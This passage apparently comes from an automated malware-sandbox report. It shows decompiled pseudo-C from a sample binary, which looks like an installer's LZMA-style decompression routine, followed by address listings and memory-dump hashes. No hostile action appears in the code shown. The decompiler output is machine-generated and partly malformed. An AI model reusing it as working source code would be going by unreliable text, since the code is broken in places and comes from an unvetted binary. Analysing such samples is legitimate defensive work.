                                                                                                                        							 *_t289 = _v104 - 1;
                                                                                                                        							__eflags =  *_t289;
                                                                                                                        							 *_v108 = __cl;
                                                                                                                        							L82:
                                                                                                                        							_v24 = __edx;
                                                                                                                        							goto L83;
                                                                                                                        						case 0x1c:
                                                                                                                        							while(1) {
                                                                                                                        								L126:
                                                                                                                        								__eflags = _v104;
                                                                                                                        								if(_v104 == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eax = _v24;
                                                                                                                        								__eax = _v24 - _v48;
                                                                                                                        								__eflags = __eax - _v120;
                                                                                                                        								if(__eax >= _v120) {
                                                                                                                        									__eax = __eax + _v120;
                                                                                                                        									__eflags = __eax;
                                                                                                                        								}
                                                                                                                        								__edx = _v12;
                                                                                                                        								__cl =  *(__edx + __eax);
                                                                                                                        								__eax = _v24;
                                                                                                                        								_v96 = __cl;
                                                                                                                        								 *(__edx + __eax) = __cl;
                                                                                                                        								__eax = __eax + 1;
                                                                                                                        								__edx = 0;
                                                                                                                        								_t420 = __eax % _v120;
                                                                                                                        								__eax = __eax / _v120;
                                                                                                                        								__edx = _t420;
                                                                                                                        								__eax = _v108;
                                                                                                                        								_v108 = _v108 + 1;
                                                                                                                        								_v104 = _v104 - 1;
                                                                                                                        								_v52 = _v52 - 1;
                                                                                                                        								__eflags = _v52;
                                                                                                                        								 *_v108 = __cl;
                                                                                                                        								_v24 = _t420;
                                                                                                                        								if(_v52 > 0) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									L83:
                                                                                                                        									_v140 = 2;
                                                                                                                        									goto L3;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_v140 = 0x1c;
                                                                                                                        							L173:
                                                                                                                        							_push(0x22);
                                                                                                                        							_pop(_t574);
                                                                                                                        							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                        							return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L174:
                                                                                                                        				_t538 = _t537 | 0xffffffff;
                                                                                                                        				return _t538;
                                                                                                                        			}










































                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x0040680d
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x00000000
                                                                                                                        0x004061be
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x004061a1
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406461
                                                                                                                        0x00406464
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406440
                                                                                                                        0x00406443
                                                                                                                        0x00406446
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x00406459
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040647d
                                                                                                                        0x00406481
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406487
                                                                                                                        0x0040648b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406491
                                                                                                                        0x00406493
                                                                                                                        0x00406497
                                                                                                                        0x00406497
                                                                                                                        0x0040649a
                                                                                                                        0x0040649e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x00000000
                                                                                                                        0x00406509
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406515
                                                                                                                        0x00406519
                                                                                                                        0x00406520
                                                                                                                        0x00406523
                                                                                                                        0x00406526
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x00406529
                                                                                                                        0x0040652c
                                                                                                                        0x0040652f
                                                                                                                        0x0040652f
                                                                                                                        0x00406532
                                                                                                                        0x00406535
                                                                                                                        0x00406538
                                                                                                                        0x00406538
                                                                                                                        0x0040653b
                                                                                                                        0x00406542
                                                                                                                        0x00406547
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004065d5
                                                                                                                        0x004065d5
                                                                                                                        0x004065d9
                                                                                                                        0x00406977
                                                                                                                        0x00000000
                                                                                                                        0x00406977
                                                                                                                        0x004065df
                                                                                                                        0x004065e2
                                                                                                                        0x004065e5
                                                                                                                        0x004065e9
                                                                                                                        0x004065ec
                                                                                                                        0x004065f2
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f7
                                                                                                                        0x004065fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061ca
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x00000000
                                                                                                                        0x0040693b
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f2
                                                                                                                        0x004061f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061fb
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                        • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                                        • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                        • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004063D0() {
                                                                                                                        				signed int _t539;
                                                                                                                        				unsigned short _t540;
                                                                                                                        				signed int _t541;
                                                                                                                        				void _t542;
                                                                                                                        				signed int _t543;
                                                                                                                        				signed int _t544;
                                                                                                                        				signed int _t573;
                                                                                                                        				signed int _t576;
                                                                                                                        				signed int _t597;
                                                                                                                        				signed int* _t614;
                                                                                                                        				void* _t621;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t621 - 0x40) != 1) {
                                                                                                                        						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                        						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                        						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                        						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                        						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                        						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                        						 *(_t621 - 0x58) = _t539;
                                                                                                                        						goto L68;
                                                                                                                        					} else {
                                                                                                                        						 *(__ebp - 0x84) = 8;
                                                                                                                        						while(1) {
                                                                                                                        							L132:
                                                                                                                        							 *(_t621 - 0x54) = _t614;
                                                                                                                        							while(1) {
                                                                                                                        								L133:
                                                                                                                        								_t540 =  *_t614;
                                                                                                                        								_t597 = _t540 & 0x0000ffff;
                                                                                                                        								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                        								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                        									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                        									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                        									 *(_t621 - 0x40) = 1;
                                                                                                                        									_t541 = _t540 - (_t540 >> 5);
                                                                                                                        									 *_t614 = _t541;
                                                                                                                        								} else {
                                                                                                                        									 *(_t621 - 0x10) = _t573;
                                                                                                                        									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                        									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                        								}
                                                                                                                        								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                        									goto L139;
                                                                                                                        								}
                                                                                                                        								L137:
                                                                                                                        								if( *(_t621 - 0x6c) == 0) {
                                                                                                                        									 *(_t621 - 0x88) = 5;
                                                                                                                        									L170:
                                                                                                                        									_t576 = 0x22;
                                                                                                                        									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                        									_t544 = 0;
                                                                                                                        									L172:
                                                                                                                        									return _t544;
                                                                                                                        								}
                                                                                                                        								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                        								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                        								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                        								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                        								L139:
                                                                                                                        								_t542 =  *(_t621 - 0x84);
                                                                                                                        								while(1) {
                                                                                                                        									 *(_t621 - 0x88) = _t542;
                                                                                                                        									while(1) {
                                                                                                                        										L1:
                                                                                                                        										_t543 =  *(_t621 - 0x88);
                                                                                                                        										if(_t543 > 0x1c) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
                                                                                                                        											case 0:
                                                                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                        												_t543 =  *( *(_t621 - 0x70));
                                                                                                                        												if(_t543 > 0xe1) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												_t547 = _t543 & 0x000000ff;
                                                                                                                        												_push(0x2d);
                                                                                                                        												asm("cdq");
                                                                                                                        												_pop(_t578);
                                                                                                                        												_push(9);
                                                                                                                        												_pop(_t579);
                                                                                                                        												_t617 = _t547 / _t578;
                                                                                                                        												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                        												asm("cdq");
                                                                                                                        												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                        												 *(_t621 - 0x3c) = _t612;
                                                                                                                        												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                        												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                        												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                        												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                        													L10:
                                                                                                                        													if(_t620 == 0) {
                                                                                                                        														L12:
                                                                                                                        														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                        														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                        														goto L15;
                                                                                                                        													} else {
                                                                                                                        														goto L11;
                                                                                                                        													}
                                                                                                                        													do {
                                                                                                                        														L11:
                                                                                                                        														_t620 = _t620 - 1;
                                                                                                                        														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                        													} while (_t620 != 0);
                                                                                                                        													goto L12;
                                                                                                                        												}
                                                                                                                        												if( *(_t621 - 4) != 0) {
                                                                                                                        													GlobalFree( *(_t621 - 4));
                                                                                                                        												}
                                                                                                                        												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        												 *(_t621 - 4) = _t543;
                                                                                                                        												if(_t543 == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												} else {
                                                                                                                        													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                        													goto L10;
                                                                                                                        												}
                                                                                                                        											case 1:
                                                                                                                        												L13:
                                                                                                                        												__eflags =  *(_t621 - 0x6c);
                                                                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                                                                        													 *(_t621 - 0x88) = 1;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                        												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                        												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                        												_t45 = _t621 - 0x48;
                                                                                                                        												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                        												__eflags =  *_t45;
                                                                                                                        												L15:
                                                                                                                        												if( *(_t621 - 0x48) < 4) {
                                                                                                                        													goto L13;
                                                                                                                        												}
                                                                                                                        												_t555 =  *(_t621 - 0x40);
                                                                                                                        												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                        													L20:
                                                                                                                        													 *(_t621 - 0x48) = 5;
                                                                                                                        													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                        													goto L23;
                                                                                                                        												}
                                                                                                                        												 *(_t621 - 0x74) = _t555;
                                                                                                                        												if( *(_t621 - 8) != 0) {
                                                                                                                        													GlobalFree( *(_t621 - 8));
                                                                                                                        												}
                                                                                                                        												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                        												 *(_t621 - 8) = _t543;
                                                                                                                        												if(_t543 == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												} else {
                                                                                                                        													goto L20;
                                                                                                                        												}
                                                                                                                        											case 2:
                                                                                                                        												L24:
                                                                                                                        												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                        												 *(_t621 - 0x84) = 6;
                                                                                                                        												 *(_t621 - 0x4c) = _t562;
                                                                                                                        												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                        												goto L132;
                                                                                                                        											case 3:
                                                                                                                        												L21:
                                                                                                                        												__eflags =  *(_t621 - 0x6c);
                                                                                                                        												if( *(_t621 - 0x6c) == 0) {
                                                                                                                        													 *(_t621 - 0x88) = 3;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                        												_t67 = _t621 - 0x70;
                                                                                                                        												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                        												__eflags =  *_t67;
                                                                                                                        												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                        												L23:
                                                                                                                        												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                        												if( *(_t621 - 0x48) != 0) {
                                                                                                                        													goto L21;
                                                                                                                        												}
                                                                                                                        												goto L24;
                                                                                                                        											case 4:
                                                                                                                        												L133:
                                                                                                                        												_t540 =  *_t614;
                                                                                                                        												_t597 = _t540 & 0x0000ffff;
                                                                                                                        												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                        												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                        													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                        													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                        													 *(_t621 - 0x40) = 1;
                                                                                                                        													_t541 = _t540 - (_t540 >> 5);
                                                                                                                        													 *_t614 = _t541;
                                                                                                                        												} else {
                                                                                                                        													 *(_t621 - 0x10) = _t573;
                                                                                                                        													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                        													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                        												}
                                                                                                                        												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                        													goto L139;
                                                                                                                        												}
                                                                                                                        											case 5:
                                                                                                                        												goto L137;
                                                                                                                        											case 6:
                                                                                                                        												__edx = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x34) = 1;
                                                                                                                        													 *(__ebp - 0x84) = 7;
                                                                                                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        													L132:
                                                                                                                        													 *(_t621 - 0x54) = _t614;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        												__esi =  *(__ebp - 0x60);
                                                                                                                        												__cl = 8;
                                                                                                                        												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        												__ecx =  *(__ebp - 0x3c);
                                                                                                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        												if( *(__ebp - 0x38) >= 4) {
                                                                                                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        														_t98 = __ebp - 0x38;
                                                                                                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        														__eflags =  *_t98;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x38) = 0;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        												if( *(__ebp - 0x34) == __edx) {
                                                                                                                        													__ebx = 0;
                                                                                                                        													__ebx = 1;
                                                                                                                        													goto L61;
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x14);
